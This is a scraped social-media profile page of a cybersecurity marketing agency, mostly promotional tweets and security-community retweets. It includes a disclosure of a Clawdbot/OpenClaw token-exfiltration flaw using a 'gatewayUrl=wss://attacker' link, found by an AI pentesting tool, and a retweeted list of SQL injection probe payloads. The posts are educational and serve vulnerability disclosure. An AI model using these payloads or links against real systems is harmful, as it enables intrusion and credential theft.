HackerContent

6.2K posts

HackerContent banner
HackerContent

HackerContent

@hacker_content

We create content and manage socials for your cybersecurity organization. 🚀 Sound good? 👉 https://t.co/H8NucTI4zJ Founded by @hakluke

Visit our website 👉 Katılım Şubat 2022
143 Takip Edilen7.3K Takipçiler
HackerContent
HackerContent@hacker_content·
One solid technical blog post should become 8+ pieces of content: a Twitter thread, a LinkedIn post, a short video script, an infographic, newsletter content, a webinar topic, a podcast talking point, and a lead magnet. Stop creating from scratch every time. Get us to do the hard work 👇 hackercontent.com
English
0
0
0
104
HackerContent
HackerContent@hacker_content·
If your pipeline depends on referrals, you don’t have a marketing engine, you have a hope strategy. If you're not sure what to do next, it's content. Content is the only channel that compounds. Every post is a salesperson that doesn’t sleep, and every blog is a closer that doesn’t take PTO.
English
0
0
2
151
HackerContent
HackerContent@hacker_content·
Something to think about... a lot of cybersecurity marketing campaigns fail because they are too safe. Safe content gets ignored. Pick a stance, something real - then publish like you mean it.
English
0
0
1
1.3K
HackerContent
HackerContent@hacker_content·
Founders doing their own marketing is the most expensive hobby in cybersecurity. Let us build authority while you build the product.
English
0
0
2
191
HackerContent
HackerContent@hacker_content·
Founders running their own social accounts is the same as “I’ll just do my own pentest.” Possible, but expensive and inconsistent.
English
0
0
2
162
HackerContent retweetledi
Luke Stephens (hakluke)
Luke Stephens (hakluke)@hakluke·
If you are marketing a cybersecurity company, you need to watch this 👀
English
3
3
16
2K
HackerContent retweetledi
Burp Suite
Burp Suite@Burp_Suite·
We've all done it. Change the default proxy interception state in ⚙️ > Proxy > Default Proxy interception state
Burp Suite tweet media
English
5
15
193
7.8K
HackerContent retweetledi
Web Security Academy
Web Security Academy@WebSecAcademy·
Me packing for a holiday.
Web Security Academy tweet media
English
2
11
157
5.6K
Ben Sadeghipour
Ben Sadeghipour@NahamSec·
Desperate times call for desperate measures: I have had 4 video ideas that have failed in the last 24 hours and I need some ideas for Monday. 🫠
English
11
1
83
6.8K
HackerContent retweetledi
Burp Suite
Burp Suite@Burp_Suite·
A screenshot of the exact point where you decided to lock in. 😎
Burp Suite tweet media
English
12
19
268
11.6K
HackerContent
HackerContent@hacker_content·
Security does not generate revenue. Security prevents loss. That sounds obvious, but it deeply affects how you justify budget. @Hacker0x01's framing of Return on Mitigation (RoM) is a useful way to explain security value in business language: mitigated losses vs total cost of mitigation. If you have ever been asked “what is the ROI of this pentest / bug bounty / control”, RoM comes into it's own. Do you have a metric you trust for “security value”, or is it still vibes and compliance checklists? By the way - my company HackerContent worked with HackerOne to produce this whitepaper. If you're interested in whitepaper/research production, or any cybersecurity content, drop us a DM! hackerone.com/report/return-…
English
1
3
23
9.7K
HackerContent retweetledi
André Baptista
André Baptista@0xacb·
🚨We found RCE in Clawdbot 🚨 If you're using Clawdbot/Moltbot, I can get RCE on your computer just by getting you to click a link.  The coolest part? This vulnerability (CVE-2026-25253) took only 100 minutes to discover, and it was discovered completely autonomously using @Ethiack's AI pentesting solution "Hackian". Here's how it went down 👇 We set Hackian against Clawdbot, purely blackbox. It discovered that the Control UI stores the gateway auth token in localStorage and builds the first WebSocket connect frame from it on load. Hackian discovered that the UI also accepts "gatewayUrl" via query params: /chat?gatewayUrl=wss://attacker. This overrides the saved gateway and auto connects 😏 On first load, the UI immediately opens a WebSocket to the attacker URL and sends the token! Think that's cool? Wait until you see how it upgraded this to a full RCE for local Clawdbot systems. Read the deets 👇 ethiack.com/news/blog/one-…
English
24
157
677
120.4K
HackerContent retweetledi
NetworkChuck
NetworkChuck@NetworkChuck·
The Dark Web isn't what you think Watch the full video: youtu.be/U2-JPqrALsA
YouTube video
YouTube
English
5
24
264
12K
HackerContent retweetledi
Burp Suite
Burp Suite@Burp_Suite·
Authenticated vulnerability scans made easy… Let Burp AI handle the login flow for active scans!
English
4
32
223
16.1K
HackerContent retweetledi
bugcrowd
bugcrowd@Bugcrowd·
From financial services to global enterprises, every organization is vulnerable. Every. Single. One. ☝️ That’s why Bugcrowd's 2026 Inside the Mind of a Hacker Report is your new BFF. We surveyed 2,000 hackers, and they’re showing exactly how they think, adapt, and operate today. As @davegerryjr, CEO of Bugcrowd, puts it, this report uncovers the human side of modern threats. Take a look 👀⤵ bugcrowd.com/resources/repo…
English
0
3
18
2.2K
HackerContent retweetledi
André Baptista
André Baptista@0xacb·
💥 One click could completely compromise a @OpenClaw / Moltbot / Clawdbot (CVE-2026-25253) The vulnerability is now fixed, but here's how it worked: - gatewayUrl Parameter: A GET parameter automatically overrides the WebSocket gateway URL used by the Control UI - Token Exfiltration: Visiting a malicious link leaks the victim's auth token to the attacker's server - WebSocket CORS Bypass: No origin validation means attackers can reach localhost through the victim's browser - Instant RCE: Stolen token = full system access via arbitrary commands.
André Baptista tweet media
English
4
8
36
3.6K
HackerContent retweetledi
HackingHub
HackingHub@hackinghub_io·
Fetch the Flag 2026 with @snyksec and @NahamSec is here! Sign up and test your skills against the best in the community. Event Details: 📅 February 12-13 ⏰ 12 PM ET start Ready to compete? Register today👉 snyk.co/ujxq4
English
1
8
70
7.5K
HackerContent retweetledi
Web Security Academy
Web Security Academy@WebSecAcademy·
SQL injection is still out there! Here are 5 simple manual detection methods you can try. 1. Simple breaking characters Hit parameters with breaking characters like ', ", ) or ; to see if the app returns errors or behaves differently. If you can make the server leak an SQL error, or even just produce an unusual response, that’s your first scent. 2. Test boolean conditions Swap a parameter between a true and false condition. If the page reacts differently, the parameter is likely being used in a WHERE clause. For example: ?id=5 AND 1=1 (should behave normally) ?id=5 AND 1=2 (should behave differently) If you're dealing with blind SQLi, this is a very good sign. 3. Timing differences If the app doesn’t show errors or different responses, use time-based checks to force a noticeable delay. Examples: MySQL: ?id=1 AND SLEEP(5) Postgres: ?id=1 AND pg_sleep(5) MSSQL: ?id=1; WAITFOR DELAY '00:00:05' If the page hangs for a long time, you've likely found a time-based blind SQLi. 4. Fuzz parameters that don’t look injectable People forget that SQLi can hide anywhere: Headers, hidden form fields, JSON bodies, cookies, WebSockets. 5. Try different input data types Many SQLi cases pop up when you send types the backend isn’t expecting. Example: If ?id=10 works fine, try: ?id=abc If you get type handling errors, there's a chance that the dev didn’t parameterise the query properly. What are we missing?
Web Security Academy tweet media
English
1
31
181
7.5K